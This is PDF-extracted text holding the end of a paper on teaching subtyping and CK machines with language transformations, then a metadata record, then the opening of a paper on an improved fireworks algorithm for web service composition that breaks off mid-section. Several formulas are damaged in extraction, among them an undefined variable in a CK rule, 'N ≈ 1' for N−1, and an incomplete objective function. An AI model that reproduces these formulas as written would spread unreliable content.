(\textit{doublyApply} e_1 e_2 e_3 e_4 k) \rightarrow e_2, (\textit{doublyApply} v_1 e_3 e_4 k) & \text{Order} \\
(\textit{doublyApply} v_1 e_3 e_4 k) \rightarrow e_3, (\textit{doublyApply} v_1 v_2 e_4 k) & \text{Order} \\
(\textit{doublyApply} v_1 v_2 e_4 k) \rightarrow e_4, (\textit{doublyApply} v_1 v_2 v_3 k) & \text{Order} \\
(\textit{doublyApply} v_1 v_2 v_3 k) \rightarrow ((v_2 (v_1 v_3)), (v_1 (v_2 v_4))), k & \text{Computation}
The exam could also ask for the CK reduction rules of \textit{addToPairAsList}. However, this task is slightly simpler than \textit{doublyApply}, and we therefore were not interested in requesting those rules.
3 Evaluation
As we have previously said, we have run two iterations of the undergraduate PL course that we have described. To evaluate the merits of our thesis, we have collected information about students’ success with the final exam, and more specifically, with their success in answering the questions “Subtyping of \textit{doublyApply}”, “Subtyping of \textit{addToPairAsList}”, and “CK for \textit{doublyApply}”.
For each question, we have evaluated the answer of each student as “Correct”, “Partially Correct”, “Partially Incorrect”, and “Incorrect/Missing”. Students’ answers were classified as “Correct” only if they matched the solution given in the previous section. Answers were classified as “Incorrect/Missing” if they were missing, or they were completely incorrect. What constitutes a completely incorrect, a partially incorrect, and a partially correct answer is subjective by nature, therefore we have to draw a line in the sand, somehow subjectively. Our rationale is the following. A “Partially Correct” answer does not match the solution but shows that the student was on the way towards a correct solution. A “Partially Incorrect” answer contains some elements that demonstrate that the student is applying some correct reasoning principles. A completely incorrect answer (“Incorrect/Missing”) provides no indication that the student is applying correct reasoning principles.
In total, we have conducted the study on 55 students. The rating of students’ answers is shown in the following table.
<table>
<thead>
<tr>
<th></th>
<th>Correct</th>
<th>Partially Correct</th>
<th>Partially Incorrect</th>
<th>Incorrect/Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td>Subtyping of \textit{doublyApply}</td>
<td>15</td>
<td>11</td>
<td>15</td>
<td>14</td>
</tr>
<tr>
<td>Subtyping of \textit{addToPairAsList}</td>
<td>22</td>
<td>10</td>
<td>11</td>
<td>12</td>
</tr>
<tr>
<td>CK for \textit{doublyApply}</td>
<td>18</td>
<td>13</td>
<td>10</td>
<td>14</td>
</tr>
</tbody>
</table>
The question “Subtyping of \textit{doublyApply}” seems to be the most difficult among the three, as shown by the lowest number of completely correct answers. Subtyping of \textit{doublyApply} is indeed a rather complicated task, as it involves contravariance. Furthermore, many variables are around, and a good number of them need to be subtype of a same variable. It is not surprising that 29 out of 55 did not provide a good answer (and were “Partially Incorrect” or “Incorrect/Missing”). On the contrary, it is rather encouraging to see that 26 out of 55 students could provide a good answer (“Correct” or “Partially Correct”).
The question “Subtyping of addToPairAsList” seems to be the easiest among the three, as the highest number of students could provide a completely correct answer. Students could detect more easily that types are treated as peers in the typing rule of addToPairAsList, and perhaps this signals that this case is simpler to grasp than the contravariant case of doublyApply.
We are surprised by the results of the question “CK for doublyApply”, as such a machine seems to be rather involved. Regardless, a good number of students (18) could provide a completely correct answer, and a high number of them could give a good answer (“Correct” or “Partially Correct”). This is indicative that students could grasp the mechanics of the evaluation order, and translate it well as a CK machine.
It is safe to imagine that most students have not been exposed to formal semantics until this very course, and these questions are generally hard for them. It is encouraging to see that a good number of students could provide good answers. It may be an indication that, by and large, students could gain an understanding of subtyping and CK machines. However, we would like to explicitly say that we do not draw any general conclusion from this data.
A Note on Correctness As we have previously said, we do not claim any theoretical results of correctness of the algorithms that we have taught in class. However, we have implemented them as tools (17) that take a language specification in input written as a textual representation of operational semantics (with syntax similar to that of Ott [20]), and output the modified language specification (in the same textual format). We have applied these tools to several functional languages in order to add subtyping to them and derive their CK machines, and we have confirmed by inspecting the output languages that we have obtained the correct formulations.
3.1 Threats to Validity
The following observations keep this paper from drawing general conclusions about the thesis that language transformations are beneficial in class.
Further Studies While 55 students is a decent number, we would like to conduct more iterations of the same course, and have a larger pool of participants. When more data will be gathered, we plan to report on such data in a journal version of this paper.
Negative Experiments? It would be interesting to run instances of the course with language transformations, and also run instances without language transformations, while keeping the same syllabus and the final exam. The goal is to see whether there is a significant improvement in the success rate of exams in those courses that have used language transformations. However, we find pedagogical issues in implementing this plan. We think that adopting the final exam of Section 2.3 without having taught language transformations may not be a sensible choice. For example, simply covering subtyping with TAPL may not provide students with sufficient knowledge to complete the exam, and we may put unrealistic expectations on students’ ability to generalize and extrapolate general programming languages principles at the undergraduate level.
Perceived Effectiveness? We have made an attempt to evaluate whether students perceived that using language transformations was helpful for their learning. At the end of the course, we have given a survey for them to fill in. The survey contained six statements which, as typical in surveys, required a rating.
For example, to evaluate the task for “Subtyping of doublyApply”, the survey had the statements: “The language transformation algorithm for adding subtyping to languages helped me understand subtyping better”, and “The language transformation algorithm for adding subtyping to languages helped me add subtyping to the language at hand during the exam”. Students could assign a grade among “Strongly Agree”, “Somewhat Agree”, “Neither Agree nor Disagree”, “Somewhat Disagree” or “Strongly Disagree” to the statement. The survey requested students to rate the equivalent statements for “Subtyping of addToPairAsList” and “CK for doublyApply”.
Unfortunately, the survey did not receive participation. Our courses have taken place virtually during the COVID-19 pandemic, which may have been the cause of the experienced lack in participation.
4 Future Work
In this section, we discuss our plans. Our first goal is to evaluate the perceived effectiveness of language transformations with the survey that we have just described. Hopefully, participation to the survey will improve in the future. Other venues for future work are the following.
Improving our Current Language Transformations The procedures of Section 2.2 produce CK machines without environments, which is not typical. Our next step is to extend our procedures to capture the full Felleisen and Friedman’s CEK machine. Similarly, we plan on developing language transformations to automatically derive other popular abstract machines such as Landin’s SECD [16, and Krivine’s KAM machines.
The language transformation that we have used for subtyping works only on simple types (sums, products, options, etcetera). We would like to extend the algorithm to capture also constructors that carry maps, such as records and objects. Maps can associate field names to values, and method names to functions. Maps come with their own subtyping properties such as width-subtyping, and permutation [19, and we plan on extending our algorithm to cover them. Similarly, we would like to develop language transformations for automatically adding bounded polymorphism [6, 1], recursive subtyping [2], multiple inheritance and mixins [4, 5] to languages, to make a few examples.
Language Transformations for Other Features Subtyping and abstract machines are not the only features that can be taught in a course in the principles of programming languages. We plan on addressing other features with language transformations, and using them in class.
In teaching the formalism of operational semantics, instructors may begin with a small-step or with a big-step semantics style. Whichever style has been chosen, it could be beneficial to explain the other style with language transformations (in addition to the planned material) that turn small-step into big-step, or big-step into small-step, respectively. Much work has been done to translate one style into the other [9, 11, 12, 13, and we plan on building upon this work. It is worth noting that converting from one style to the other may come with limitations. For example, it may not be possible to derive an equivalent big-step semantics from a small-step semantics formulation when parallelism is involved. The mentioned translation methods are subject to these limitations, and so will our corresponding language transformations.
We would like to develop a language transformation for automatically generating Milner-style type inference procedures. Also, we would like to devise a language transformation for adding generic types
to languages. Some courses teach dynamic typing and run-time checking in some detail. We would like to explore the idea of automatically generating the dynamic semantics of dynamically typed languages based on a given type system. That is, a language transformation which relies on the type system to inform how the dynamic semantics should be modified in order to perform run-time type checking.
We are not aware of any work that automates the adding of the latter three examples. Developing such language transformations may be challenging research questions on their own.
Advanced Tasks Language transformations may be integrated in graduate level courses, as well. Some of these courses have a research-oriented flavour. In such courses, instructors may assign advanced tasks with language transformations. For example, instructors may ask students to study the work of Danvy et al. [11] [12] [13] to derive reduction semantics. The approach is rather elaborate, and involves techniques such as refocusing and transition compression. Instructors may ask students to develop a series of language transformations that capture this method. Similarly, instructors may ask students to model the language transformation for generating the pretty-big-step semantics from a small-step semantics [3]. Another idea is to target the Gradualizer papers [7] [8], for automatically adding gradual typing to languages.
5 Conclusion
Instructors can integrate language transformations into their undergraduate PL courses. We do not advocate replacing material, but to use language transformations in addition to the planned material. Our thesis is that language transformations are beneficial for students to help them deepen their understanding of the PL features being taught. In this paper, we have presented the study that we have conducted, and the results from this study. Although we refrain from declaring language transformations unequivocally beneficial, our numbers are encouraging, and we also offer this paper to open a conversation on the topic, and to inspire similar studies towards gathering evidence for, or against, our thesis.
Acknowledgements We would like to thank our EXPRESS/SOS 2021 reviewers for their feedback, which helped improve this paper.
References
|
{"Source-Url": "https://export.arxiv.org/pdf/2108.10493", "len_cl100k_base": 12577, "olmocr-version": "0.1.50", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 59699, "total-output-tokens": 15373, "length": "2e13", "weborganizer": {"__label__adult": 0.0007834434509277344, "__label__art_design": 0.001155853271484375, "__label__crime_law": 0.0004813671112060547, "__label__education_jobs": 0.046173095703125, "__label__entertainment": 0.0002474784851074219, "__label__fashion_beauty": 0.0003964900970458984, "__label__finance_business": 0.0004482269287109375, "__label__food_dining": 0.0009031295776367188, "__label__games": 0.001255035400390625, "__label__hardware": 0.0009255409240722656, "__label__health": 0.000935077667236328, "__label__history": 0.0007076263427734375, "__label__home_hobbies": 0.00023698806762695312, "__label__industrial": 0.0008087158203125, "__label__literature": 0.001946449279785156, "__label__politics": 0.0006322860717773438, "__label__religion": 0.0012903213500976562, "__label__science_tech": 0.0274658203125, "__label__social_life": 0.0004439353942871094, "__label__software": 0.00630950927734375, "__label__software_dev": 0.904296875, "__label__sports_fitness": 0.0005340576171875, "__label__transportation": 0.0012140274047851562, "__label__travel": 0.0004045963287353515}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54617, 0.0235]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54617, 0.42813]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54617, 0.86909]], "google_gemma-3-12b-it_contains_pii": [[0, 3185, false], [3185, 7372, null], [7372, 10366, null], [10366, 13815, null], [13815, 17603, null], [17603, 21077, null], [21077, 24718, null], [24718, 27996, null], [27996, 31472, null], [31472, 34667, null], [34667, 37656, null], [37656, 41101, null], [41101, 44578, null], [44578, 48117, null], [48117, 51452, null], [51452, 54617, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3185, true], [3185, 7372, null], [7372, 10366, null], [10366, 13815, null], [13815, 17603, null], [17603, 21077, null], [21077, 24718, null], [24718, 27996, null], [27996, 31472, null], [31472, 34667, null], [34667, 37656, null], [37656, 41101, null], [41101, 44578, null], [44578, 48117, null], [48117, 51452, null], [51452, 54617, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54617, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54617, null]], "pdf_page_numbers": [[0, 3185, 1], [3185, 7372, 2], [7372, 10366, 3], [10366, 13815, 4], [13815, 17603, 5], [17603, 21077, 6], [21077, 24718, 7], [24718, 27996, 8], [27996, 31472, 9], [31472, 34667, 10], [34667, 37656, 11], [37656, 41101, 12], [41101, 44578, 13], [44578, 48117, 14], [48117, 51452, 15], [51452, 54617, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54617, 0.025]]}
|
olmocr_science_pdfs
|
2024-12-03
|
2024-12-03
|
d8898226dded8a661a828499a3958ce204c6787c
|
Research Article
Web Service Composition Optimization with the Improved Fireworks Algorithm
Bo Jiang, Yanbin Qin, Junchen Yang, Hang Li, Liuhai Wang, and Jiale Wang
School of Computer Science and Information Engineering, Zhejiang Gongshang University, Hangzhou 310018, China
Correspondence should be addressed to Bo Jiang; nancybjiang@zjgsu.edu.cn and Jiale Wang; wjl8026@zjgsu.edu.cn
Received 21 October 2021; Revised 20 January 2022; Accepted 1 March 2022; Published 12 March 2022
Abstract
Even though the number of services is increasing, a single service can just complete simple tasks. In the face of complex tasks, we require composite multiple services to complete them. For the purpose of improving the efficiency of web service composition, we propose a service composition approach based on an improved fireworks algorithm (FWA++). First, we use the strategy of random selection to keep N−1 individuals for the next generation, and the purpose is to speed up the convergence speed of the FWA++ and enhance the search ability. Second, we randomize the total number of sparks and maximum amplitude of sparks for each generation. In this way, the search ability and the ability to jump out of the local optimal solution are dynamically balanced throughout the execution of the algorithm. Our experimental results show that compared with other existing approaches, the approach proposed in this paper is more efficient and stable.
1. Introduction
With the emergence of a large number of web services, enterprises and individuals can select multiple services to build enterprise applications and software systems through the technology of service composition [1, 2], which is called Service-Oriented Computing (SOC). Service composition is one of the core technologies of SOC, which flexibly aggregates the required resources and realizes service reuse [3]. However, with the convergence of a large number of web services with the same function, quality of service (QoS) has increasingly become an essential factor that needs to be considered in the process of selecting services from these function-equivalent services for composition. Therefore, many QoS-based web service composition methods have been proposed.
Heuristic and metaheuristic algorithms are often used to solve the web service composition problem. Metaheuristic algorithms have the characteristics of good optimization effect and less time consumption. With the attention of researchers at home and abroad, more and more metaheuristic algorithms have been proposed, including particle swarm optimization (PSO) [4], artificial bee colony (ABC) [5], Bacterial Foraging Optimization (BFO) [6], fireworks algorithm (FWA) [7], Fruit Fly Optimization (FOA) [8], Moth Search Algorithm (MSA) [9], Harris Hawks Optimization (HHO) [10], Slime Mould Algorithm (SMA) [11], and Colony Predation Algorithm (CPA) [12].
Among them, different variants of FWA have been proposed to improve the performance of the traditional FWA. Zheng et al. [13] proposed an Enhanced Fireworks Algorithm (EFWA); in their work, four strategies were utilized to improve the original FWA. First, the minimum explosion amplitude parameter was used to avoid the case of 0 amplitude. Second, the generation strategy of explosion sparks was modified to enhance explosion ability. Third, the generation strategy of Gaussian sparks and mapping rules were modified to avoid the degradation of optimization performance caused by the objective function being far from the origin. Fourth, a random selection strategy was adopted to reduce the algorithm’s running time. However, the explosion amplitude is static during the execution of the algorithm, which limits the scope of application of the algorithm. Zheng et al. [14] and Li et al. [15] proposed the Dynamic Search
Fireworks Algorithm (dynFWA) and the Adaptive Fireworks Algorithm (AFWA). The two algorithms were enhanced on the basis of the EFWA algorithm and improved the setting of explosion amplitude so that the explosion amplitude can be adaptive in the whole algorithm. Thus, the algorithm can adapt to different optimization objectives and search stages. The IFWA algorithm proposed by Zheng et al. [16] was improved on the aspect of optimization strategies. The strategy has stronger robustness and applicability by using the optimal fireworks to generate sparks instead of the explosion amplitude adjustment method of dynFWA and AFWA. However, the optimal fireworks to mutate reduces the diversity of the population, and the elite selection strategy makes the fireworks population close to the local optimal position. Yu et al. [17] proposed another elite strategy based on EFWA. Each firework and the sparks it produces are used to calculate a gradient-like vector, and then use it to estimate the convergence point, and may replace the worst firework individuals in the next generation.
In addition to improving the operator, the hybrid FWA combined with other metaheuristic algorithms is also an important research direction. Zheng et al. [18] combined the differential evolution (DE) algorithm with the FWA. A feasible solution is generated by the DE operator to the selected individual. If the fitness value of the feasible solution is better than the original individual, the original solution should be replaced. Zhang et al. [19] introduced the biogeographic optimization algorithm (BBO) into the EFWA to form a new algorithm (BBO-FWA), in which BBO provides an idea of cross-migration of firework individuals according to fitness value, and the lower the fitness value, the higher the probability of cross-migration.
What is more, FWA has been widely used in a wide range of real-world problems. Bolaji et al. [20] used FWA to train the parameters of the feedforward neural network and applied it to the classification problem. Zare et al. [21] introduced two effective cross-generation mutation operators into FWA to solve discrete and multiconstrained problems. Furthermore, this method was applied to solve the problem of multiregional economic dispatch. For more information about the applications of the FWA, please refer to the following literature [22, 23].
Although the above research has improved the FWA’s performance, according to the no free lunch theorem [24], there is no specific metaheuristic algorithm that can positively affect various types of optimization problems. So, it is encouraged to improve and apply the FWA to solve the optimization problems. In addition, the balance between the search ability and the ability to jump out of the local optimum in the FWA has not been well solved. Therefore, we propose the improved fireworks algorithm (FWA++) to solve the optimization problem of service composition. First, we cluster the services with the same function. A WDSL document records a lot of information related to the service, so we extract the service name, port type, information, document, and operation from it and transform them as an embedding. Then, the K-means algorithm is used to cluster multiple services which are transformed as embeddings. Second, we improve the original FWA in two aspects: (1) The selection strategy in the original FWA requires a lot of computation time, so we randomly keep N−1 individuals to the next generation under the premise of ensuring the optimization direction. It reduces computation time. (2) The algorithm falling into the local optimum was avoided, and strong search ability was kept. In each generation, we randomize the total number of sparks and maximum amplitude of sparks. Finally, we apply the FWA++ to service composition, and the results show that our algorithm is effective.
Our main contributions are as follows:
(i) In order to speed up the convergence speed of the FWA++, and enhance the local search ability, we use the strategy of random selection to keep individuals for the next generation
(ii) For each generation, randomize the total number of sparks and maximum amplitude of sparks. In this way, the search ability and the ability to jump out of the local optimal solution are dynamically balanced throughout the execution of the algorithm
(iii) We experimented with our approach in a real-world data set which includes 9 QoS attribute values of 2500 real web services. The results show that compared with several existing approaches, the performance of our proposed approach is better
The rest of this paper is organized as follows: Section 2 summarizes the related work of web service composition. Section 3 presents mathematical modeling for the web service composition problem and a diagram to illustrate the process of service composition. Section 4 introduces the framework of approach and design details. Section 5 introduces simulation experiments and performance evaluation. Section 6 reviews and summarizes this paper.
2. Related Work
In this section, we will refer to some literature to describe the related work of service composition. Generally, to solve the optimization problems of service composition, heuristic and metaheuristic algorithms are mainly used. Nevertheless, the metaheuristic algorithms are the essential solution, so we will focus on them in this section.
The heuristic algorithms are constructed through the experience of specific optimization problems [25]. Klein et al. [26] presented a method based on hill climbing to find the best solution. In this method, the search space is limited. So, the algorithm’s time complexity is much less than that of the linear problem when finding an optimal solution. Liu et al. [27] proposed a service composition method based on a branch constraint execution plan. The algorithm is divided into two stages: in the first stage, the composite service state is transformed into a state transition graph; then, the dynamic process of composite service execution can be analyzed. The second stage uses the web service execution language to find the best solution. Lin et al. [28] presented a relaxable QoS-based service composition approach. In this approach, the optimal solution is subject to local and global
constraints. Although the heuristic algorithm can get an approximate solution in a reasonable time and data scale, the designs of the heuristic algorithms mainly depend on the experience of specific optimization problems, so this limits its scope of application. Moreover, when dealing with the problems of large-scale data, the effect is often not guaranteed.
The metaheuristic algorithms are also approximation algorithms. They are no longer designed for specific optimization problems and have the characteristics of a good optimization effect and less time consumption. Many scholars used metaheuristics to solve service composition problems. Canfora et al. [29] tackled the service composition problem by the genetic algorithm (GA). Although GA is slower than integer programming, it is an effective method to handle service composition optimization. Furthermore, Tang and Ai [30] proposed a hybrid genetic algorithm for the optimal web service composition problem, which performs better than other algorithms. However, when service-oriented applications are complex, GA is not suitable. Ludwig [31] addressed the problem of service composition by introducing particle swarm optimization (PSO). The results show that it performs very well. However, the problem of premature convergence of PSO needs to be solved.
Chandra and Niyogi [32] proposed a modified artificial bee colony (mABC) algorithm. In this algorithm, a chaotic-based learning method is used to initialize the population, and differential evolution (DE) is used to enhance exploitation. mABC has robust scalability and high convergence speed. However, service composition is a discrete optimization problem; mABC may fall into the local optimum. Xu et al. [33] proposed an approach based on artificial bee colony (ABC) algorithms for the service composition problem. In this approach, the author improved the neighborhood search of the ABC algorithm to adapt to the discretization of service composition. At the same time, three algorithms are proposed to maintain the performance and simplicity of the approach. The results show that this approach has high accuracy and avoids local optimization. However, it is time-consuming when this approach replaces multiple component services at the same time.
Li et al. [34] introduced an elite evolutionary strategy (EES). Furthermore, it was applied to HHO to improve the convergence speed and capacity of jumping out of the local optimum. Moreover, a hybrid algorithm that combined EES and HHO was presented. This algorithm has a fast convergence speed and strong robustness. However, this approach may fall into the local optimum because service composition is a discrete optimization problem. Li et al. [35] presented a novel approach CHHO to find an optimal solution by incorporating logical chaotic sequence into the Harris Hawks Optimization (HHO) algorithm. In this approach, the neighborhood relations of concrete services were constructed to form a continuous space, which avoids CHHO falling into the local optimum. Chaotic sequences have ergodic and chaotic features, which help CHHO improve the capacity to jump out of local optimization. In large-scale scenarios, CHHO has less computation time. However, CHHO’s performance will not be good when the QoS attributes are not independent.
### 3. Problem Statement
Before proposing our approach, we will provide a diagram to illustrate the process of service composition and the mathematical modeling for the web service composition problem.
Figure 1 shows the process of service composition by using the integer coding method and the sequential combination pattern. First, input a composite service \( S = \{T_1, T_2, \ldots, T_n\} \). Here, each task corresponds to an abstract service, for example, \( T_1 \) corresponds to abstract service \( S_1 \). And each abstract service has \( m \) number of concrete services; for example, \( S_i \) has \( m \) number of concrete services with the same function. Second, select \( n \) number of concrete services from the corresponding abstract service as a composite service. In theory, there are \( \prod_{i=1}^{m} \) number of composite services. Calculate the QoS value of the composite services to obtain an optimal value that reaches the minimal objective value of Equation (3). Finally, output an optimal composite service.
In this mathematical modeling, response time and price are negative attributes; the smaller the better. Reputation and availability are positive attributes; the larger the better. Therefore, in order to unify metrics and calculations, it is necessary to normalize the QoS values. The normalization methods of QoS value are defined as follows:
\[
q_i = \begin{cases}
\frac{q_i - q_i^{\min}}{q_i^{\max} - q_i^{\min}}, & q_i^{\min} \neq q_i^{\max}, \\
1, & q_i^{\min} = q_i^{\max},
\end{cases} \quad (1)
\]
\[
q_i = \begin{cases}
\frac{q_i^{\max} - q_i}{q_i^{\max} - q_i^{\min}}, & q_i^{\min} \neq q_i^{\max}, \\
1, & q_i^{\min} = q_i^{\max},
\end{cases} \quad (2)
\]
\( q_i^{\max} \) and \( q_i^{\min} \) are the maximum value and minimum value of the \( i \)th QoS attribute of composite services, respectively; Equation (1) is used to normalize the negative attributes, such as response time and price; Equation (2) is used to normalize the positive attributes, such as reputation and availability.
We model the service composition problem as a minimization problem, and the optimization model is formulated as follows:
\[
\text{minimize} \quad \sum_{k=1}^{r} (q_k^{\text{agg}} \times w_k).
\]
In a composite service, \( r \) and \( l \) are the numbers of negative and positive QoS attributes of each service, respectively. \( w_k \) and \( w_l \) represent the weights of the \( k \)th negative and \( j \)th positive attributes, respectively. \( q_k^{\text{agg}} \) is the sum of value of the \( k \)th negative attribute of each service, and \( q_j^{\text{agg}} \) is the sum of value of the \( j \)th positive attribute of each service.
4. Proposed Approach
In this section, we will introduce the overall framework of the approach and explain the details of our approach.
4.1. The Whole Framework. The framework of our approach is shown in Figure 2, which consists of two parts: (1) Data preparation: first, the document model is used to process WSDL documents to generate the corresponding embeddings. Then, we use the k-means algorithm to cluster embeddings. Finally, they are divided into four clusters as the input data of the following algorithm. (2) Primary algorithm processing: first, FWA++ initializes fireworks population \( N \) randomly and evaluates their fitness values to find the current best solution. Second, FWA++ enters into the iterations: (a) Calculate the number of explosion sparks and the amplitude of the explosion for each fireworks according to the fitness value and then generate explosion sparks. (b) Perform Gaussian mutation to generate Gaussian sparks. Furthermore, map the unsatisfied sparks back to the feasible space. (c) According to the selection strategy, keep the current optimal solution and randomly select \( N \approx 1 \) individuals from the current sparks and fireworks for the next new generation. Finally, the algorithm termination condition is met and output the optimal solution.
4.2. Data Preparation. In this part, we will describe the process of data preprocessing in detail.
4.2.1. WSDL to Embedding. The significant text information of a service, including message, documents, service name, and operations, is recorded in the WSDL (Web Service Description Language) document. For the purpose of getting service function information, we extract message, documents, service name, and operations from the WSDL document. And then, we digitize the extracted text information. Here, the sentence transformer framework is used to convert text information into embedding. It provides an easy way to calculate dense vector representations of sentences and many models to realize the task of text digitization. We choose the paraphrase-xlm-r-multilingual-v1 model to obtain the embedding. The model is based on transformer networks such as BERT/RoBERTa/XLM-RoBERTa and achieves great performance in the mission. The text information is embedded in the vector space and is close to similar text information. After, each WSDL document is processed by the paraphrase-xlm-r-multilingual-v1 model, which is represented by an embedding. Finally, each service corresponds to an embedding.
4.2.2. Classify Web Services. The k-means algorithm is an unsupervised clustering algorithm that is relatively easy to implement. And it is widely used for good performance. The idea of the k-means algorithm is simple. A sample set is divided into several clusters according to the distance between the samples, and then, the points in the clusters close and the distance between the clusters is as large as possible. In our approach, we use k-means to cluster embeddings generated by the paraphrase-xlm-r-multilingual-v1 model, where each embedding represents each concrete service. In this way, classifying services according to functions is realized.
4.2.3. Merge Data. The QoS information corresponding to each service is merged according to the clustering result of the k-means algorithm. After the merger, each abstract service contains several concrete services. And the QoS information of each concrete service includes four attribute values, including cost, response time, reputation, and availability.
4.3. Fireworks Algorithm. The fireworks algorithm (FWA) is inspired by the fireworks explosion and presented by Tan and Zhu [7]. The idea of the algorithm is simple, but the specific implementation is complicated. It is mainly composed of four parts: explosion operator, mutation operator, mapping rule, and selection strategy. In the explosion phase, explosion sparks will be generated. And the basic principle is that if a firework’s fitness value is better than that of other fireworks, it will have a smaller explosion range and generate more explosion sparks. The purpose is to speed up the local search ability near the current optimal solution. On the contrary, if a firework’s fitness value is relatively poor, it has an extensive explosion range and generates a small number of explosion sparks. The primary purpose is to enhance the diversity of the population. In the mutation phase, Gaussian sparks will be generated and increase the diversity of the spark population. Meanwhile, unsatisfied Gaussian sparks...
are mapped to the feasible space by the mapping rule. In the selection phase, the algorithm will refer to the pros and cons of sparks’ location and randomly keep a specified number of sparks. The framework of the fireworks algorithm is shown in Figure 3. For each generation of explosion, N number of locations are selected; N fireworks are set off. And then, we obtain the location of sparks and evaluate the quality of the locations. The algorithm stops once the optimal solution is found. On the contrary, we select N other locations from the current fireworks and sparks as the next generation of explosion.
4.4. Feasible Solution Encoding. Before using the algorithm to implement service composition, each concrete service must be coded. The integer coding method is adopted to code them. Here, the concrete service in each abstract service is coded starting from 1. If there are N services in an abstract service, then 1, 2, 3, 4, ⋯, N is the code of its services, and the remaining abstract services are also used this way. Figure 4 shows a feasible solution [1–3, 5], which means that service 1 is selected from the first abstract service, service 5 is selected from the second abstract service, service 3 is selected from the third abstract service, and service 2 is selected from the fourth abstract service.
4.5. Operator Analysis. Suppose the problem to be optimized is
$$\text{Min } f(x) \in R, \quad x \in \Omega,$$
where \(\Omega\) is the feasible region of the solution. Below, we will introduce each part in detail.
4.5.1. Explosion Operator. The explosion operation is essential for the fireworks to generate sparks. Generally, fireworks with better fitness values can generate more sparks in a smaller area; it enhances the algorithm’s capability of local search. Conversely, fireworks with poor fitness values can only generate fewer sparks in a larger range; it is aimed at increasing the diversity of sparks and improving the algorithm’s global search capability.
In the FWA, the explosion amplitude of each firework and the number of explosion sparks are calculated based on its fitness value relative to other fireworks. For a firework \(x_i\), the formulas for the explosion amplitude \(A_i\) and the number of explosion sparks \(S_i\) are defined as follows:
$$A_i = \hat{A} \times \frac{f(x_i) - y_{\min} + \varepsilon}{\sum_{i=1}^{N} (f(x_i) - y_{\min}) + \varepsilon}, \quad (5)$$
$$S_i = M \times \frac{y_{\max} - f(x_i) + \varepsilon}{\sum_{i=1}^{N} (y_{\max} - f(x_i)) + \varepsilon}, \quad (6)$$
where \(y_{\min} = \min (f(x_i)) (i = 1, 2, \cdots, N)\) is the minimum fitness value in the current firework population and \(y_{\max} = \max (f(x_i)) (i = 1, 2, \cdots, N)\) is the maximum fitness value in the current firework population. \(\hat{A}\) is a constant used to adjust the amplitude of the explosion, \(M\) is also a constant used to adjust the number of explosion sparks, and \(\varepsilon\) is the minimum positive constant to avoid division by zero. In order to dynamically balance the search ability and the ability to jump out of the local optimal solution of the FWA++, FWA++ randomizes the total number of spark \(M\) and amplitude of sparks \(\hat{A}\) in each generation.
Limit the fireworks with good fitness value to generate too many explosion sparks. At the same time, fireworks with poor fitness value will generate few explosion sparks, and the number of sparks $S_i$ is determined by the following formula:
$$S_i = \begin{cases} \text{round}(a \cdot M), & S_i < aM, \\ \text{round}(b \cdot M), & S_i > bM, a < b < 1, \\ \text{round}(S_i), & \text{otherwise}, \end{cases}$$
(7)
where $a$ is lower bound for explosion amplitude, $b$ is upper bound for explosion amplitude, and round($\cdot$) is a rounding function based on the rounding principle.
When a firework explodes, the sparks can be affected by the explosion in any $z$ direction. The FWA uses a formula to randomly obtain several dimensions affected by the explosion:
$$z = \text{round}(d^* \cdot \text{rand}(0, 1)), \quad (8)$$
where $d$ is the dimension of a firework and rand$(0, 1)$ represents a random number function conforming to a uniform distribution on the interval $[0, 1]$.
Assuming that the $i$th firework is $x_i = (x_{i1}, x_{i2}, \cdots, x_{iN})$, the formula for generating sparks is
$$h = A_j \cdot \text{rand}(-1, 1),$$
$$e \cdot x^*_k = x^*_k + h, \quad (9)$$
4.5.2. Mutation Operator. Many sparks can be generated through the explosion operation, but these sparks are mainly around the original firework and have similar properties to the original firework population. In order to keep the diversity of the sparks, FWA introduces a mutation operator to generate Gaussian sparks. The process of generating Gaussian sparks is as follows: FWA selects a firework $x_i$ from the firework population randomly, and then, it randomly selects a certain number of dimensions for the firework to perform Gaussian mutation operation. Performing Gaussian mutation operation on the selected dimension $k$ of a firework $x_i$ is
$$\tilde{x}_{ik} = x_{ik} \times e, \quad (10)$$
where $e \sim n(1, 1), n(1, 1)$ represents the Gaussian distribution with a mean value of 1 and variance of 1.
4.5.3. Mapping Rules. The explosion sparks and Gaussian sparks may exceed the boundary range of feasible region Ω. When the spark xi exceeds the boundary in dimension k, it is mapped to a new location through the mapping rule of formula (11):
\[ \tilde{x}_{ik} = x_{\text{LB},k} + \left| \tilde{x}_k \right| \% (x_{\text{UB},k} - x_{\text{LB},k}), \]
(11)
where \( x_{\text{LB},k} \) and \( x_{\text{UB},k} \) are the upper and lower bounds of the solution space on dimension k, respectively.
4.5.4. Selection Strategy. In FWA, in order to keep the excellent individuals in the firework population to the next generation population, N individuals need to be selected from the candidate set composed of explosion sparks, Gaussian sparks, and fireworks in the current generation. Suppose that the candidate set is k and the population size is N. The individual with the smallest fitness value in the candidate set will be determinately selected to the next generation as a firework (elite strategy), and the remaining \( N-1 \) fireworks will be selected from the candidate set. For candidate \( x_i \), the calculation formula of the selected probability is as follows:
